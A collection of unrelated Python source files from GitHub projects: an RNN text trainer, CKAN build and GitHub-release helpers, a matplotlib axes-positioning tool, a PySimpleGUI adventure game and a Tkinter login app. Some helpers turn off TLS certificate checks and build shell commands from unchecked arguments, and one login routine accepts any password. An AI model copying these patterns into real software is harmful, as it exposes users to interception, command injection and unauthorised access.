if '#' not in line:
if 'Neurons to print:' in line:
line = line.replace('Neurons to print:', '')
intervals = ''.join(line.split()).split(',')
for interval in intervals:
if ':' in interval:
interval = interval.split(':')
interval[0] = str(max(int(interval[0]), 0))
interval[-1] = str(min(int(interval[-1]), self.K - 1))
self.neurons_of_interest.extend(range(int(interval[0]), int(interval[-1]) + 1))
else:
interval = str(max(int(interval), 0))
interval = str(min(int(interval), self.K - 1))
self.neurons_of_interest.append(int(interval))
if 'Neurons to plot:' in line:
line = line.replace('Neurons to plot:', '')
intervals = ''.join(line.split()).split(',')
self.intervals_to_plot = []
self.interval_limits = []
self.interval_label_shift = '' # ' '
for interval in intervals:
if ':' in interval:
interval = interval.split(':')
interval[0] = str(max(int(interval[0]), 0))
interval[-1] = str(min(int(interval[-1]), self.K-1))
self.neurons_of_interest_plot.extend(range(int(interval[0]), int(interval[-1]) + 1))
self.neurons_of_interest_plot_intervals.append(range(int(interval[0]), int(interval[-1]) + 1))
intermediate_range = [i for i in range(int(interval[0])+1, int(interval[-1])) if i%5 == 0]
intermediate_range.insert(0, int(interval[0]))
intermediate_range.append(int(interval[-1]))
intermediate_range_str = [str(i) for i in intermediate_range]
intermediate_range_str[-1] += self.interval_label_shift
self.intervals_to_plot.extend(intermediate_range_str)
self.interval_limits.extend(intermediate_range)
else:
interval = str(max(int(interval), 0))
interval = str(min(int(interval), self.K - 1))
self.neurons_of_interest_plot.append(int(interval))
self.neurons_of_interest_plot_intervals.append([int(interval)])
self.intervals_to_plot.append(interval)
self.interval_limits.append(int(interval))
self.interval_limits = array(self.interval_limits)
def back_prop(self, x, y, output, h):
tau = len(x)
# Initialize gradients
for grad, weight in zip(self.gradients, self.weights):
setattr(self, grad, zeros(getattr(self, weight).shape))
dLdO = []
for t in range(tau):
dLdO.append(output[t].T - y[t].T)
self.dLdV += dot(dLdO[t].T, h[t+1].T)
self.dLdC += dLdO[t].T
dLdAt = zeros((1, self.n_hidden_neurons))
for t in range(tau - 1, -1, -1):
dLdHt = dot(dLdO[t], self.V) + dot(dLdAt, self.W)
dLdAt = dot(dLdHt, diag(1 - h[t+1][:, 0]**2))
self.dLdW += dot(dLdAt.T, h[t].T)
self.dLdU += dot(dLdAt.T, x[t].T)
self.dLdB += dLdAt.T
if self.clip_gradients:
for grad in self.gradients:
setattr(self, grad, maximum(minimum(getattr(self, grad), self.gradient_clip_threshold), -self.gradient_clip_threshold))
def compute_loss(self, output, y):
# Cross entropy loss
tau = len(y)
loss = 0
accuracy = 0
if self.word_domain:
for t in range(tau):
loss += .5*sum((output[t] - y[t])**2)
accuracy += sum(output[t] - y[t])
else:
for t in range(tau):
loss -= sum(log(dot(y[t].T, output[t])))
p = output[t]
cp = cumsum(p)
rand = random.uniform()
diff = cp - rand
sample_index = [i for i in range(len(diff)) if diff[i] > 0]
if sample_index:
sample_index = sample_index[0]
else:
sample_index = len(diff) - 1
accuracy += y[t][sample_index]
loss = loss/max(float(tau), 1e-6)
accuracy = float(accuracy)/max(float(tau), 1e-6)
return loss, accuracy
def to_one_hot(self, x):
binarizer = sklearn.preprocessing.LabelBinarizer()
binarizer.fit(range(max(x.astype(int)) + 1))
X = array(binarizer.transform(x.astype(int))).T
return X
def seq_to_one_hot(self, x):
X = [array([self.char_to_ind.get(xt)]).T for xt in x]
return X
def seq_to_one_hot_matrix(self, x):
x_ind = self.seq_to_one_hot(x)
X = concatenate(x_ind, axis=1)
return X
def tanh(self, x):
return (exp(x) - exp(-x))/(exp(x) + exp(-x))
def softmax(self, s):
ex_p = exp(s)
p = ex_p/ex_p.sum()
return p
def randomize_hyper_parameters(n_configurations, attributes):
attributes['nEpochs'] = 5
attributes['weightInit'] = 'He'
for i in range(n_configurations):
attributes['n_hidden_neurons'] = 16*int(5*random.rand()+12)
attributes['eta'] = int(9*random.rand() + 1)*10**(-5 - int(2*random.rand()))
print('\n')
print('n: ' + str(attributes['n_hidden_neurons']))
print('Learning rate: ' + str(attributes['eta']))
print('\n')
rnn = VisualizeRNN(attributes)
rnn.run_vanilla_rnn()
def main():
attributes = {
'text_file': '../Corpus/ted_en.zip', # Corpus file for training
'dark_theme': True, # True for dark theme, else light (then terminal text/background color needs to be adjusted)
'train_model': False, # True to train model, otherwise inference process is applied for text generation
'model_directory': 'Vanilla RNN Saved Models/val_loss2.072-val_acc0.445-loss1.335-epoch6-iteration674039-neurons224-eta-9.00e-5/',
'word_domain': False, # True for words, False for characters
'save_sentences': False, # Save sentences and vocabulary
'load_sentences': True, # Load sentences and vocabulary
'validation_proportion': .02, # The proportion of data set used for validation
'corpus_proportion': 1.0, # The proportion of the corpus used for training and validation
'ada_grad_sgd': True, # Stochastic gradient decent, True for ada_grad, False for regular SGD
'clip_gradients': True, # True to avoid exploding gradients
'gradient_clip_threshold': 5, # Threshold for clipping gradients
'weight_init': 'Load', # 'He', 'Load' or 'Random'
'eta': 9.00e-5, # Learning rate
'n_hidden_neurons': 224, # Number of hidden neurons
'n_epochs': 10, # Total number of epochs, each corresponds to (n book characters)/(seq_length) seq iterations
'seq_length': 25, # Sequence length of each sequence iteration
'length_synthesized_text': 300, # Sequence length of each print of text evolution
'length_synthesized_text_best': 1000, # Sequence length of final best sequence, requires save_parameters
'rms_prop': True, # Implementation of rms_prop to ada_grad_sgd
'gamma': 0.9, # Weight factor of rms_prop
'save_parameters': False # Save best weights with corresponding arrays iterations and smooth loss
}
# randomize_hyper_parameters(500, attributes)
rnn_vis = VisualizeRNN(attributes)
rnn_vis.run_vanilla_rnn()
if __name__ == '__main__':
random.seed(2)
main()
plt.show()
``` |
{
"source": "johndalton/CKAN",
"score": 2
} |
#### File: CKAN/bin/ckan-build.py
```python
from ckan_github_utils import *
import os, sys
import argparse
def main():
parser = argparse.ArgumentParser(description='Builds CKAN from a list of commit hashes')
parser.add_argument('--ckan-core-hash', dest='core_hash', action='store', help='The commit hash for CKAN-core', required=False)
parser.add_argument('--ckan-gui-hash', dest='gui_hash', action='store', help='The commit hash for CKAN-GUI', required=False)
parser.add_argument('--ckan-cmdline-hash', dest='cmdline_hash', action='store', help='The commit hash for CKAN-cmdline', required=False)
parser.add_argument('--ckan-release-version', dest='release_version', action='store', help='The version with which to stamp ckan.exe', required=False)
args = parser.parse_args()
build_ckan(args.core_hash, args.gui_hash, args.cmdline_hash, args.release_version)
if __name__ == "__main__":
main()
```
#### File: CKAN/bin/ckan_github_utils.py
```python
GITHUB_API = 'https://api.github.com'
CKAN_CORE_VERSION_STRING = 'private readonly static string BUILD_VERSION = null;'
CKAN_CORE_VERSION_STRING_TARGET = 'private readonly static string BUILD_VERSION = "%s";'
# ---* DO NOT EDIT BELOW THIS LINE *---
import os, sys
import urllib
import requests
from urlparse import urljoin
import datetime
import base64
import json
import shutil
def run_git_clone(repo, commit_hash):
if os.path.isdir(repo):
shutil.rmtree(repo)
cwd = os.getcwd()
if os.system('git clone https://github.com/KSP-CKAN/%s.git' % repo) != 0:
sys.exit(1)
os.chdir(os.path.join(cwd, repo))
if commit_hash != 'master':
if os.system('git checkout -f %s' % commit_hash) != 0:
sys.exit(1)
os.chdir(cwd)
def build_repo(repo):
cwd = os.getcwd()
os.chdir(os.path.join(cwd, repo))
if os.system('sh build.sh') != 0:
sys.exit(1)
os.chdir(cwd)
def stamp_ckan_version(version):
cwd = os.getcwd()
os.chdir(os.path.join(cwd, 'CKAN-core'))
meta_contents = None
with open('Meta.cs', 'r') as meta_file:
meta_contents = meta_file.read()
if meta_contents == None:
print 'Error reading Meta.cs'
sys.exit(1)
meta_contents = meta_contents.replace(CKAN_CORE_VERSION_STRING, CKAN_CORE_VERSION_STRING_TARGET % version)
with open("Meta.cs", "w") as meta_file:
meta_file.write(meta_contents)
os.chdir(cwd)
def build_ckan(core_hash, gui_hash, cmdline_hash, release_version):
if core_hash == None:
core_hash = 'master'
if gui_hash == None:
gui_hash = 'master'
if cmdline_hash == None:
cmdline_hash = 'master'
print 'Building CKAN from the following commit hashes:'
print 'CKAN-core: %s' % core_hash
print 'CKAN-GUI: %s' % gui_hash
print 'CKAN-cmdline: %s' % cmdline_hash
run_git_clone('CKAN-core', core_hash)
run_git_clone('CKAN-GUI', gui_hash)
run_git_clone('CKAN-cmdline', cmdline_hash)
if release_version != None:
stamp_ckan_version(release_version)
build_repo('CKAN-core')
build_repo('CKAN-GUI')
build_repo('CKAN-cmdline')
print 'Done!'
def make_github_post_request(url_part, username, password, payload):
url = urljoin(GITHUB_API, url_part)
print '::make_github_post_request - %s' % url
return requests.post(url, auth = (username, password), data = json.dumps(payload), verify=False)
def make_github_get_request(url_path, username, password, payload):
url = urljoin(GITHUB_API, url_path)
print '::make_github_get_request - %s' % url
return requests.get(url, auth = (username, password), data = json.dumps(payload), verify=False)
def make_github_put_request(url_path, username, password, payload):
url = urljoin(GITHUB_API, url_path)
print '::make_github_put_request - %s' % url
return requests.put(url, auth = (username, password), data = json.dumps(payload), verify=False)
def make_github_post_request_raw(url_part, username, password, payload, content_type):
url = urljoin(GITHUB_API, url_part)
print '::make_github_post_request_raw - %s' % url
headers = { 'Content-Type': content_type }
return requests.post(url, auth = (username, password), data = payload, verify=False, headers=headers)
def make_github_release(username, password, repo, tag_name, name, body, draft, prerelease):
payload = {}
payload['tag_name'] = tag_name
payload['name'] = name
payload['body'] = body
payload['draft'] = draft
payload['prerelease'] = prerelease
return make_github_post_request('/repos/%s/releases' % repo, username, password, payload)
def make_github_release_artifact(username, password, upload_url, filepath, content_type = 'application/zip'):
filename = os.path.basename(filepath)
query = { 'name': filename }
url = '%s?%s' % (upload_url[:-7], urllib.urlencode(query))
payload = file(filepath, 'r').read()
return make_github_post_request_raw(url, username, password, payload, content_type)
def get_github_file(username, password, repo, path):
return make_github_get_request('/repos/%s/contents/%s' % (repo, path), username, password, {})
def push_github_file_sha(username, password, repo, path, sha, content, branch='master'):
payload = {}
payload['path'] = path
payload['message'] = 'Updating build-tag'
payload['content'] = base64.b64encode(content)
payload['sha'] = sha
payload['branch'] = branch
return make_github_put_request('/repos/%s/contents/%s' % (repo, path), username, password, payload)
def push_github_file(username, password, repo, path, content, branch='master'):
response = get_github_file(username, password, repo, path)
if response.status_code >= 400:
print 'There was an issue fetching "%s"! Status: %s - %s' % (path, str(response.status_code), response.text)
sys.exit(1)
response_json = json.loads(response.text)
return push_github_file_sha(username, password, repo, response_json['path'], response_json['sha'], content)
``` |
{
"source": "johndamen/axpositioning",
"score": 3
} |
#### File: axpositioning/axpositioning/axpositioning.py
```python
from matplotlib.axes import Axes
from matplotlib.transforms import Bbox
class PositioningAxes(Axes):
"""
Class for editing axes position
"""
@classmethod
def from_axes(cls, fig, a, **kwargs):
return cls(fig, a.get_position().bounds, **kwargs)
def __init__(self, fig, bounds, lock_aspect=False, anchor='C', **kwargs):
super(PositioningAxes, self).__init__(fig, bounds, **kwargs)
self._locked_aspect = lock_aspect
self.set_anchor(anchor)
def set_anchor(self, a):
"""ensure tuple of anchor position and set using Axes.set_anchor"""
if a in Bbox.coefs:
a = Bbox.coefs[a]
self._anchor = a
def split(self, ratio=0.5, spacing=0.1, wsplit=True):
anchor = self.get_anchor()
self.set_anchor('SW')
try:
if wsplit:
pos, size = self.x, self.w
else:
pos, size = self.y, self.h
if spacing >= size:
raise ValueError('spacing too large, cannot split axes')
size1 = (size - spacing) * ratio
size2 = (size - spacing) * (1 - ratio)
pos2 = pos + size1 + spacing
if wsplit:
newbounds = (pos2, self.y, size2, self.h)
self.w = size1
else:
newbounds = (self.x, pos2, self.w, size2)
self.h = size1
finally:
self.set_anchor(anchor)
return newbounds
@property
def bounds(self):
"""returns (xll, yll, w, h)"""
return self._position.bounds
@bounds.setter
def bounds(self, v):
"""set new bounds"""
self.set_position(v)
@property
def absolute_bounds(self):
"""screen coordinates of bounds"""
x, y, w, h = self.bounds
return self.rel2abs(x, 'x'), \
self.rel2abs(y, 'y'), \
self.rel2abs(w, 'w'), \
self.rel2abs(h, 'h')
def x2xll(self, x):
"""convert x position to xll based on anchor"""
return x - self.w * self.get_anchor()[0]
def xll2x(self, xll):
"""convert xll to x position based on anchor"""
return xll + self.w * self.get_anchor()[0]
def y2yll(self, y):
"""convert y position to yll based on anchor"""
return y - self.h * self.get_anchor()[1]
def yll2y(self, yll):
"""convert yll to y position based on anchor"""
return yll + self.h * self.get_anchor()[1]
@property
def x(self):
"""x position as xll corrected for the anchor"""
return self.xll2x(self.bounds[0])
@x.setter
def x(self, x):
"""reset the bounds with a new x value"""
_, yll, w, h = self.bounds
xll = self.x2xll(x)
self.bounds = xll, yll, w, h
@property
def y(self):
return self.yll2y(self.bounds[1])
@y.setter
def y(self, y):
"""reset the bounds with a new y value"""
xll, _, w, h = self.bounds
yll = self.y2yll(y)
self.bounds = xll, yll, w, h
@property
def w(self):
"""width of the axes"""
return self.bounds[2]
@w.setter
def w(self, w):
"""
reset the bounds with a new width value
the xll is corrected based on the anchor
if the aspect ratio is locked, the height and yll are also adjusted
"""
xll, yll, w0, h = self.bounds
# adjust horizontal position based on anchor
xll += self.get_anchor()[0] * (w0 - w)
# adjust height if aspect is locked
if self._locked_aspect:
h0, h = h, w / self.axaspect
# adjust vertical position based on anchor
yll += self.get_anchor()[1] * (h0 - h)
self.bounds = xll, yll, w, h
@property
def h(self):
"""height of the axes"""
return self.bounds[3]
@h.setter
def h(self, h):
"""
reset the bounds with a new height value
the yll is corrected based on the anchor
if the aspect ratio is locked, the width and xll are also adjusted
"""
xll, yll, w, h0 = self.bounds
# adjust vertical position based on anchor
yll += self.get_anchor()[1] * (h0 - h)
# adjust width if aspect is locked
if self._locked_aspect:
w0, w = w, h * self.axaspect
# adjust horizontal position based on anchor
xll += self.get_anchor()[0] * (w0 - w)
self.bounds = xll, yll, w, h
@property
def figaspect(self):
"""aspect ratio of the figure"""
fw, fh = self.figure.get_size_inches()
return fw/fh
@property
def axaspect(self):
"""aspect ratio of the axes"""
return self.figaspect / self.aspect
@property
def aspect(self):
"""real aspect ratio of figure and axes together"""
_, _, aw, ah = self.bounds
return self.figaspect * (aw/ah)
@aspect.setter
def aspect(self, v):
self.set_aspect_ratio(v)
def lock_aspect(self, b):
"""keep the aspect fixed"""
self._locked_aspect = b
def set_aspect_ratio(self, A, fix_height=False):
"""set the aspect ratio by adjusting width or height"""
axaspect = A / self.figaspect
if fix_height:
self.w = self.h * axaspect
else:
self.h = self.w / axaspect
def __repr__(self):
return '<{} ({})>'.format(
self.__class__.__qualname__,
', '.join('{:.2f}'.format(b) for b in self.bounds))
@classmethod
def from_position(cls, fig, x, y, w, h, anchor):
"""
accounts for anchor when setting the bounds from the position
"""
# TODO: incorporate in __init__ using apply_anchor=True
o = cls(fig, [x, y, w, h], anchor=anchor)
o.x, o.y, o.w, o.h = x, y, w, h
return o
def abs2rel(self, val, attr):
w, h = self.figure.get_size_inches()
dpi = self.figure.get_dpi()
if attr in ('w', 'x'):
return val / (w*dpi)
elif attr in ('h', 'y'):
return val / (h*dpi)
else:
return val
def rel2abs(self, val, attr):
w, h = self.figure.get_size_inches()
dpi = self.figure.get_dpi()
if attr in ('w', 'x'):
return val * w * dpi
elif attr in ('h', 'y'):
return val * h * dpi
else:
return val
```
#### File: axpositioning/gui/__init__.py
```python
from PyQt5 import QtWidgets, QtCore
import sys
import subprocess
import pickle
from matplotlib.figure import Figure
from .main import AxPositioningEditor
__all__ = ['position_axes_gui', 'position_axes_gui_subprocess', 'adjust_figure_layout']
def position_axes_gui(figsize, bounds, **kwargs):
"""
open gui to set axes positions
:param figsize: tuple of width and height
:param bounds: list of axes bounds
:param kwargs: ...
:return: list of new bounds
"""
if isinstance(figsize, Figure):
figsize = figsize.get_size_inches()
app = QtWidgets.QApplication([])
w = AxPositioningEditor(figsize, bounds, **kwargs)
w.show()
try:
app.exec()
return w.as_dict()
finally:
w.deleteLater()
def position_axes_gui_subprocess(figsize, bounds):
"""
open gui in new subprocess and retrieve the results over stdout
:param figsize: figure size
:param bounds: list of axes bounds
:return: new bounds
"""
cmd = [sys.executable, '-m', __name__, '--stream-bounds', '-W', str(figsize[0]), '-H', str(figsize[1])]
p = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
pickler = pickle.Pickler(p.stdin)
pickler.dump(bounds)
p.stdin.close()
p.wait()
out = p.stdout.read()
newbounds = []
for line in out.decode('utf-8').splitlines():
if not line:
continue
if line.startswith('FIG:'):
figsize = tuple(map(float, line[4:].strip().split(',')))
else:
newbounds.append([float(v) for v in line.strip().split(',')])
return figsize, newbounds
def adjust_figure_layout(fig, **kwargs):
axes = fig.get_axes()
bounds = [a.get_position().bounds for a in axes]
figsize, newbounds = position_axes_gui_subprocess(fig.get_size_inches(), bounds)
fig.set_size_inches(*figsize)
for a in axes[len(newbounds):]:
fig.delaxes(a)
assert len(fig.get_axes()) <= len(newbounds)
for i, bnd in enumerate(newbounds):
try:
ax = axes[i]
except IndexError:
ax = fig.add_axes(bnd)
else:
ax.set_position(list(bnd))
``` |
{
"source": "johndao1005/Hacktoberfest-2",
"score": 3
} |
#### File: Beginner/03. Python/webscraping.py
```python
import requests
def get_bs4_page(url, headers=True):
if headers:
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) '
'AppleWebKit/537.36 (KHTML, like Gecko) '
'Chrome/39.0.2171.95 Safari/537.36'}
r = requests.get(url, headers=headers)
page = BeautifulSoup(r.content, 'lxml')
return page
``` |
{
"source": "johndao1005/pythonPlayground",
"score": 4
} |
#### File: johndao1005/pythonPlayground/pythonGui.py
```python
import PySimpleGUI as sg
def make_window(content,choice1,choice2):
layout =[[sg.Text(content)],[sg.Button(choice1),sg.Button(choice2)]]
return sg.Window('Light house', layout, finalize=True)
window0,window1,window2= sg.Window("Light house",[[sg.Text("Welcome to my game")],[sg.Button("Start"),sg.Button("Exit")]],finalize=True),None,None
def lightHouseGUI():
while True:
window, event, values = sg.read_all_windows()
if event == sg.WINDOW_CLOSED or event == 'Quit' or event == 'Exit'or event=="Restart":
window.close()
if window == window2: # if closing win 2, mark as closed
window2 = None
elif window == window0: # if closing win 1, exit program
break
if event == "Start" or event == "Restart":
window1= make_window("Welcome To the lighthouse,\n You just wake up to find yourself in a cold room with nothing\nbut darkness around, outside only the sound of the ocean and cold gale while you \nlying on the, cold dirty floor. Suddenly loud noise can be hear outside. Looking out the window,\nyou saw a dark shadow with claw climb up the light house.\nWhat do you want to do?",'Jump out the window','Try to escape')
elif event == "Jump out the window":
window1.close()
window2 = make_window("You jump out the window and try to grab the Monster to die with you. \nWhen both of you are falling, you remove the mask to see yourself with a happy smile. The monster whisper in your ear: \n'Wear the mask if you want something new'\nDo you want to wear the mask?","Wear the mask","Just die")
elif event == "Try to escape":
window1.close()
window2 = make_window("Looking at the door tightly locked door. What would you do?","Look for key","Ram the door")
elif event == "Ram the door":
window2.close()
window1 = make_window("You dislocate your shouder and try to look for key instead. but the monster catch up\nSo you die. Too bad.","Restart","Quit")
elif event == "Look for key":
window2.close()
window1 =make_window("Lucky the key is in your pocket somehow. You unlock the door and want to go down the stair but the stair is broken. What do you do?", \
"Find a Rope","Jump down")
elif event == "Find a Rope":
window1.close()
window2 = make_window("Running back you facing the monster. there is a sword nearby\nWould you take the sword and fight for your last chance?","Fight","Beg for Mercy")
elif event == "Fight":
window2.close()
window1 =make_window("Taking the sword and fight for your life. Surpisingly, you seem to know\nThe monster movement like yourself and you win after stabing it heart. Upon\ncoming closer and remove the mask, you saw your face smiling in relieve. \nLooking at the mask, look like it is pulling you over. What would you do?", "Wear the mask","Stab yourself")
elif event == "Beg for Mercy":
window2.close()
window1 =make_window("Too scared from looking at the monster. You begged for your life. Seem like u didnt watch much\nscary movie, why begging then you will die anyway num num. Dont need to say much, You die", \
"Restart","Quit")
elif event =="Stab yourself":
window1.close()
window2 =make_window(".Waking up in your room feeling unreal but relieved. Suddenly, you Feel tired and want to go back to sleep.\nWould you sleep again?\n*Note: This is the closest thing of winning this game. Be proud", \
"Restart","Quit")
elif event == "Jump down":
window1.close()
window2 = make_window("you over jump and hurt your leg. The Monster catch up quickly and you die. lol ",\
"Restart","Quit")
elif event == "Just die":
window2.close()
window1 =make_window("You die, pretty sad, want to start again?", "Restart","Quit")
elif event == "Wear the mask":
window2.close()
window1=make_window("The Monster is inside you and you are the monster, You will keep hunting yourself till you die","Restart","Quit")
if __name__== "__main__":
lightHouseGUI()
# Trying to stay in the same window
# layout = [[sg.Text("Welcome To the lighthouse,\n You just wake up to find yourself in a cold room with nothing\n\
# but darkness around, outside only the sound of the ocean and cold gale while you \n\
# lying on the, cold dirty floor. Suddenly loud noise can be hear outside. Looking out the window,\n\
# you saw a dark shadow with claw climb up the light house.\n\
# What do you want to do?",key='-TEXT-') ],\
# # [sg.Button('Jump out the window',visible=False,key='-14-'), sg.Button('Try to escape',visible=False,key='-16-')],\
# [sg.Button('Take the mask',visible=False,key='-13-'), sg.Button('Just die, lol',visible=False,key='-14-')],\
# [sg.Button('Restart',visible=False,key='-11-'), sg.Button('Quit',visible=False,key='-12-')],\
# [sg.Button('Take the mask',visible=False,key='-9-'), sg.Button('Smash it',visible=False,key='-10-')],\
# [sg.Button('Fight back',visible=False,key='-7-'), sg.Button('Beg for your life',visible=False,key='-8-')],\
# [sg.Button('Go back to find a rope',visible=False,key='-5-'), sg.Button('Try to jump',visible=False,key='-6-')],\
# [sg.Button('Look for key',visible=False,key='-3-'), sg.Button('Ram the door',visible=False,key='-4-')],\
# [sg.Button('Jump out the window',key='-1-'), sg.Button('Try to escape',key='-2-')]]
# # Create the window
# window = sg.Window('Light house', layout)
# # Display and interact with the Window using an Event Loop
# def choice(content,option1,option2):
# window[f'-{option1}-'].update(visible=False)
# window[f'-{option1+1}-'].update(visible=False)
# window['-TEXT-'].update(content)
# window[f'-{option2}-'].update(visible=True)
# window[f'-{option2+1}-'].update(visible=True)
# # See if user wants to quit or window was closed
# # Output a message to the window
# while True:
# event, values = window.read()
# if event == sg.WINDOW_CLOSED or event == 'Quit':
# break
# if event =='-1-':
# choice("You jump out the window and try to grab the Monster to die with you. When both of you are falling, you remove the mask to see yourself with a happy smile. The monster whisper in your ear:\n'Wear the mask if you want something new':\n "\
# ,1,13)
# if event =='-2-':
# choice("Looking at the door tightly locked door. What would you do?",1,3)
# if event =='-3-':
# choice("Lucky the key is in your pocket somehow. You unlock the door and want to go down the stair but the stair is broken. What do you do?",3,5)
# if event =='-4-':
# choice()
# if event =='-5-':
# choice()
# if event =='-6-':
# choice()
# if event =='-7-':
# choice()
# if event =='-8-':
# choice()
# if event =='-9-':
# choice()
# if event =='-10-':
# choice()
# if event =='-11-':
# event, values = window.read()
# break
# # Finish up by removing from the screen
# window.close()
``` |
{
"source": "johndao1005/SDV602-Milestone2-QuangThanhDao",
"score": 4
} |
#### File: controller/login/auth.py
```python
from tkinter.messagebox import showinfo, showerror
def authentication(parent, name, pw=""):
from view.dataView import dataView
"""Function to check the if username and password is correct then destroy the login window
and open the main menu to allow users interact with the application
Args:
name (string): username from user input
pw (string): password from user input
"""
showinfo("Welcome User", "Login successfully, Happy browsing!!")
parent.destroy()
dataView()
```
#### File: controller/login/register.py
```python
def makeUser(self,name,pw,pw2,email):
"""Checking input is valid and not already exist in the current database before creating new user instance
Args:
name (string): username taken from user input, need to be more than 2 characters and less than 20 characters
pw (string): password taken from user input, need to be more than 8 character and less than 20 characters
pw2 (string): confirm password, need to be identical with password input
email (string): email from user, need to have @ and valid email name
"""
self.destroy()
pass
```
#### File: model/data/data_scan.py
```python
import csv
from os import path
import pandas as pd
from typing import Dict
class DataManager():
"""Data manager class which handle the raw data at the lowest level which directly interact with csv
"""
def readFile(self, filePath):
"""Read csv file in dictionary format with dict reader
Args:
filePath (string): the path to the file
Returns:
array: list of the row data which readed with dictionary reader
"""
with open(filePath, 'r', newline="") as data:
dataset = csv.DictReader(data)
output = []
for row in dataset:
output.append(row)
return output
def append(self, newFile, currentFile,):
"""added the new File data into the current file at the button with dictionary writer
Args:
newFile (string): the directory of the target file
currentFile (string): the directory of the current file
"""
header = ["X", "Y", "FID", "id", "modified", "language", "rights", "rightsHolder", "bibliographicCitation", "institutionCode", "collectionCode", "basisOfRecord", "catalogNumber", "occurrenceRemarks", "individualID", "individualCount", "sex", "occurrenceStatus", "eventDate", "year", "waterBody",
"decimalLatitude", "decimalLongitude", "geodeticDatum", "coordinateUncertaintyInMeters", "footprintWKT", "georeferenceRemarks", "scientificNameID", "scientificName", "kingdom", "phylum", "class", "order_", "family", "genus", "subgenus", "specificEpithet", "infraspecificEpithet", "scientificNameAuthorship"]
with open(currentFile, 'a', newline="") as targetData:
writer = csv.DictWriter(targetData, header,extrasaction='ignore')
for row in self.readFile(newFile):
writer.writerow(row)
def readLocation(self, filePath):
"""Reading the current csv file in pandas to allow plotting the data with geopandas with the map
Args:
filePath (string): the path to the csv file
Returns:
pandas: pandas format longtitude and latitude
"""
locationData = pd.read_csv(filePath,
usecols=["decimalLatitude",
"decimalLongitude"],
)
return locationData
``` |
{
"source": "johndao1005/SDV602-Milestone3-QuangThanhDao",
"score": 4
} |
#### File: controller/login/auth.py
```python
from tkinter.messagebox import showinfo, showerror
from view.dataView import DataView
def authentication(login, email, pw):
"""Function to check the if username and password is correct then destroy the login window
and open the main menu to allow users interact with the application
Args:
login (class): instance of login window
name (string): email from user input
pw (string): password from user input
"""
if email.strip() == "" or pw.strip() == "":
showerror("Empty input", "Please type your email and password to login")
else:
checkUser = login.userControl.authentication(email, pw)
if isinstance(checkUser, str):
showerror("Authentication failed", checkUser)
else:
showinfo("Login success", "You seem legal, happy browsing")
login.destroy()
DataView(checkUser['name']).mainloop()
```
#### File: controller/login/register.py
```python
from tkinter.messagebox import showinfo, showerror
import re
regex = r'\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b'
def register(login, name, pw, pw2, email):
"""Checking input is valid and not already exist in the current database before creating new user instance
Args:
login (class): an instance of login window
name (string): username taken from user input, need to be more than 2 characters and less than 20 characters
pw (string): password taken from user input, need to be more than 8 character and less than 20 characters
pw2 (string): confirm password, need to be identical with password input
email (string): email from user, need to have @ and valid email name
"""
error = ""
pw = pw.strip()
pw2 = pw2.strip()
name = name.strip()
email = email.strip()
# validate the information
if len(pw) < 8:
error += "\nThe password needs to be at least 8 characters"
if pw2 != pw:
error += "\nThe confirm password must be the same as <PASSWORD>"
if not re.fullmatch(regex, email):
error += "\nEnter a valid email address"
elif login.userControl.check('email', email) != 0:
error += "\nThe email is already in use"
if login.userControl.check('name', name) != 0:
error += "\nThe username is already in use"
# check if there is no error then create users
if error != "":
showerror("Incorrect input(s)",
f"Please correct the following errors:{error}")
else:
login.userControl.register(name, pw, email)
showinfo("Registered success", "User is registered successfully")
login.closeSignup()
```
#### File: controller/menu/merge_csv.py
```python
from model.dataControl import Model
from tkinter.messagebox import showerror, showinfo
def mergeFiles(target, dataview):
"""working with merging the target file data into the source file data
Args:
target (variable): the target file path which give file from the upload window
dataview (variable): the main window which will excute the method to control DES and upload window
"""
if target == "":
showerror("Error", "Please select to merge")
elif dataview.dataHandler.checkRecord() != dataview.lastModified:
showerror(
"Error", "There are change to database please update before upload the new data")
else:
dataControl = Model()
dataControl.upload(target)
showinfo("Upload success",
"The data is uploaded and will be loaded for viewing")
dataview.refresh()
dataview.closeUpload()
```
#### File: SDV602-Milestone3-QuangThanhDao/view/login.py
```python
import tkinter as tk
from tkinter import ttk
import view.setup as setup
from controller.login.auth import authentication
from controller.login.register import register
from model.connect import UserControl
class Login(tk.Tk):
"""Start an instance of login screen which allow user to sign up with top level window or login directly
When users login, the class would open to menu which is another class which handle the data view, update, delete while
destroy the current login to prevent multiple login.
"""
def __init__(self, *args, **kwargs):
self.userControl = UserControl()
tk.Tk.__init__(self, *args, **kwargs)
self.title(setup.app_name)
self.iconbitmap(setup.icon)
options = setup.pad10
option2 = setup.pad5
self.resizable(0, 0)
label = ttk.Label(self, text="Login").grid(
column=0, row=0, sticky="N", **options, columnspan=3)
self.check = False
# ANCHOR data input
lf = ttk.Frame(
self,
).grid(column=0, row=0, padx=10, pady=0)
password = tk.StringVar()
username = tk.StringVar()
label = ttk.Label(lf, text="Email").grid(
column=0, row=1, **options, ipadx=5, ipady=5)
email_entry = ttk.Entry(lf, textvariable=username)
email_entry.grid(
column=1, row=1, **options, columnspan=2)
label = ttk.Label(lf, text="Password").grid(
column=0, row=2, **options, ipadx=5, ipady=5)
password_entry = ttk.Entry(
lf, textvariable=password, show="*")
password_entry.grid(column=1, row=2, **options, columnspan=2)
# ANCHOR Buttons for main window
button_frame = ttk.Frame(
self,
).grid(column=1, row=1, padx=10, pady=10)
login_btn = ttk.Button(button_frame,
text="Login",
command=lambda: authentication(
self, email_entry.get(), password_entry.get())
).grid(column=1, row=3, **option2)
signup_btn = ttk.Button(button_frame,
text="Sign Up",
command=lambda: self.callSignup()
).grid(column=2, row=3, **option2)
quit_btn = ttk.Button(self,
text="Quit",
command=lambda: self.destroy()
).grid(column=2, row=4, **options)
def callSignup(self):
"""The function check for any instance of signup and only create a sign up window if there is none
"""
if self.check == False:
self.signupWindow()
def signupWindow(self):
"""function to create a sign up window as toplevel window
"""
self.check = True
self.signup = tk.Toplevel()
self.signup.title(setup.app_name)
self.signup.iconbitmap(setup.icon)
options = setup.pad10
label = ttk.Label(self.signup, text="Sign up").grid(
column=0, row=0, **options, columnspan=2)
self.signup.geometry("310x360+100+100")
self.signup.protocol("WM_DELETE_WINDOW", self.closeSignup)
# Create placeholder to store data
username = tk.StringVar()
password = tk.StringVar()
confirmPassword = tk.StringVar()
email = tk.StringVar()
lf = ttk.LabelFrame(self.signup, text="Login details")
